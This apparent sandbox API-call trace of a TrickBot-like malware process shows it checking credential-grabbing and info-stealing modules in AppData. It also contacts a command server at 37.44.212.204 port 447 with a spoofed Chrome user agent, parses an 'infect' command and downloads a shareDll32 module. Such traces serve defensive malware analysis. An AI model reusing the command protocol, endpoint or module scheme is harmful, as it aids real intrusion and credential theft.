	[0227.344] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.344] GetFileTime (in: hFile=0x610, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.344] CloseHandle (hObject=0x610) returned 1
	[0227.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0227.344] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0227.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0227.344] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26e438, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0227.344] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.344] GetFileTime (in: hFile=0x610, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.344] CloseHandle (hObject=0x610) returned 1
	[0227.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0227.345] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0227.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0227.345] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26e438, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0227.345] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.345] GetFileTime (in: hFile=0x610, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.345] CloseHandle (hObject=0x610) returned 1
	[0227.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x271f00) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738590) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22caa30) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b6298) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x234f30) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778398) returned 1
	[0227.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7308) returned 1
	[0227.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7308
	[0227.345] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0227.346] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0227.346] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0227.346] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0227.346] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0227.734] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0227.734] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0227.734] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x8b) returned 1
	[0227.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x27732c0
	[0227.734] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x27732c0, dwNumberOfBytesToRead=0x8b, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27732c0*, lpdwNumberOfBytesRead=0x128bdc*=0x8b) returned 1
	[0227.734] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0227.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27732c0, cbMultiByte=139, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139
	[0227.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x120) returned 0x22b180
	[0227.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27732c0, cbMultiByte=139, lpWideCharStr=0x22b180, cchWideChar=139 | out: lpWideCharStr="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890") returned 139
	[0227.735] StrStrIW (lpFirst="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890"
	[0227.735] StrStrIW (lpFirst="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890"
	[0227.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc30
	[0227.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe10
	[0227.735] lstrcpynW (in: lpString1=0x22ffe10, lpString2="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", iMaxLength=3 | out: lpString1="62") returned="62"
	[0227.735] StrStrIW (lpFirst="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890"
	[0227.736] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffc30, Size=0x10) returned 0x22ffbb8
	[0227.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc30
	[0227.736] lstrcpynW (in: lpString1=0x22ffc30, lpString2="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", iMaxLength=7 | out: lpString1="tot478") returned="tot478"
	[0227.736] StrStrIW (lpFirst="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890"
	[0227.738] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffbb8, Size=0x10) returned 0x22ffde0
	[0227.738] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c8098
	[0227.738] lstrcpynW (in: lpString1=0x22c8098, lpString2="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", iMaxLength=50 | out: lpString1="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611"
	[0227.738] StrStrIW (lpFirst="g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/68975977/\r\nshareDll control infect\r\n1234567890"
	[0227.739] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffde0, Size=0x10) returned 0x22ffbb8
	[0227.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c71e8
	[0227.739] lstrcpynW (in: lpString1=0x22c71e8, lpString2="g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD/68975977/\r\nshareDll control infect\r\n1234567890", iMaxLength=32 | out: lpString1="g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD") returned="g0KbsBTo7Uk6Tp7Pl5Ni3MevIavEbwD"
	[0227.739] StrStrIW (lpFirst="68975977/\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned="/\r\nshareDll control infect\r\n1234567890"
	[0227.740] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffbb8, Size=0x20) returned 0x2778500
	[0227.740] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778438
	[0227.740] lstrcpynW (in: lpString1=0x2778438, lpString2="68975977/\r\nshareDll control infect\r\n1234567890", iMaxLength=9 | out: lpString1="68975977") returned="68975977"
	[0227.740] StrStrIW (lpFirst="\r\nshareDll control infect\r\n1234567890", lpSrch="/") returned 0x0
	[0227.741] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2778500, Size=0x20) returned 0x2778488
	[0227.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa0c8
	[0227.741] lstrcpynW (in: lpString1=0x22aa0c8, lpString2="\r\nshareDll control infect\r\n1234567890", iMaxLength=38 | out: lpString1="\r\nshareDll control infect\r\n1234567890") returned="\r\nshareDll control infect\r\n1234567890"
	[0227.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778500
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263a28) returned 1
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8638) returned 1
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7500) returned 1
	[0227.741] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0227.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330c0) returned 1
	[0227.742] StrStrIW (lpFirst="\r\nshareDll control infect\r\n1234567890", lpSrch="\r\n") returned="\r\nshareDll control infect\r\n1234567890"
	[0227.742] StrStrIW (lpFirst="shareDll control infect\r\n1234567890", lpSrch="\r\n") returned="\r\n1234567890"
	[0227.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0227.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0227.742] lstrcpynW (in: lpString1=0x22a6490, lpString2="shareDll control infect\r\n1234567890", iMaxLength=24 | out: lpString1="shareDll control infect") returned="shareDll control infect"
	[0227.742] StrStrIW (lpFirst="1234567890", lpSrch="\r\n") returned 0x0
	[0227.742] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x22ad318
	[0227.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330c0
	[0227.742] lstrcpynW (in: lpString1=0x27330c0, lpString2="1234567890", iMaxLength=11 | out: lpString1="1234567890") returned="1234567890"
	[0227.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b180) returned 1
	[0227.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0227.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0227.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27732c0) returned 1
	[0227.742] lstrcmpW (lpString1="68975977", lpString2="68975886") returned 1
	[0227.743] StrStrIW (lpFirst="shareDll control infect", lpSrch=" ") returned=" control infect"
	[0227.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0227.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778488
	[0227.743] lstrcpynW (in: lpString1=0x2778488, lpString2="shareDll control infect", iMaxLength=9 | out: lpString1="shareDll") returned="shareDll"
	[0227.743] StrStrIW (lpFirst="control infect", lpSrch=" ") returned=" infect"
	[0227.743] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad318, Size=0x10) returned 0x22ad378
	[0227.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0227.743] lstrcpynW (in: lpString1=0x22ad318, lpString2="control infect", iMaxLength=8 | out: lpString1="control") returned="control"
	[0227.743] StrStrIW (lpFirst="infect", lpSrch=" ") returned 0x0
	[0227.743] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x22ad348
	[0227.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0227.743] lstrcpynW (in: lpString1=0x22ad378, lpString2="infect", iMaxLength=7 | out: lpString1="infect") returned="infect"
	[0227.743] CryptStringToBinaryW (in: pszString="infect", cchString=0x6, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0227.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad240
	[0227.743] CryptStringToBinaryW (in: pszString="infect", cchString=0x6, dwFlags=0x7, pbBinary=0x22ad240, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x22ad240, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0227.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="control", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
	[0227.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0227.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="control", cchWideChar=-1, lpMultiByteStr=0x22ad2d0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="control", lpUsedDefaultChar=0x0) returned 8
	[0227.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0227.744] lstrcmpiW (lpString1="injectDll32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="pwgrab32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="networkDll32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="psfin32", lpString2="shareDll32") returned -1
	[0227.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0227.744] lstrcmpiW (lpString1="control", lpString2="start") returned -1
	[0227.744] lstrcmpiW (lpString1="control", lpString2="release") returned -1
	[0227.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0227.744] lstrcmpiW (lpString1="injectDll32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="pwgrab32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="networkDll32", lpString2="shareDll32") returned -1
	[0227.744] lstrcmpiW (lpString1="psfin32", lpString2="shareDll32") returned -1
	[0227.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0227.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0227.744] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0227.745] WinHttpConnect (hSession=0x22c5418, pswzServerName="37.44.212.204", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c5078
	[0227.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27784b0
	[0227.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6308
	[0227.746] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0227.746] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/shareDll32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0227.746] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x128338, dwBufferLength=0x4) returned 1
	[0227.746] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0229.807] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0229.807] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128328, lpdwBufferLength=0x128324, lpdwIndex=0x0 | out: lpBuffer=0x128328*, lpdwBufferLength=0x128324*=0x4, lpdwIndex=0x0) returned 1
	[0229.807] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0xee5) returned 1
	[0229.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22efc68
	[0229.808] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x22efc68, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x22efc68*, lpdwNumberOfBytesRead=0x128324*=0xee5) returned 1
	[0229.808] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x19fb) returned 1
	[0229.809] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22efc68, Size=0x28e0) returned 0x277bc00
	[0229.809] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x277cae5, dwNumberOfBytesToRead=0x19fb, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x277cae5*, lpdwNumberOfBytesRead=0x128324*=0x19fb) returned 1
	[0229.809] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x0) returned 1
	[0229.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac538
	[0229.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2765c68
	[0229.810] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.810] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.811] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0229.811] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a28
	[0229.811] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778a28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778a28, pdwDataLen=0x128ba4) returned 1
	[0229.811] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.811] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.811] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.812] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.812] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0229.812] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a50
	[0229.812] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778a50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778a50, pdwDataLen=0x128ba4) returned 1
	[0229.812] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.812] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.812] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.813] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.813] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0229.813] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a78
	[0229.813] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778a78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778a78, pdwDataLen=0x128ba4) returned 1
	[0229.813] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.813] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.813] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.814] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.814] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0229.814] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778aa0
	[0229.814] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778aa0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778aa0, pdwDataLen=0x128ba4) returned 1
	[0229.814] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.814] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.815] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.815] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.815] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa0, dwFlags=0x0) returned 1
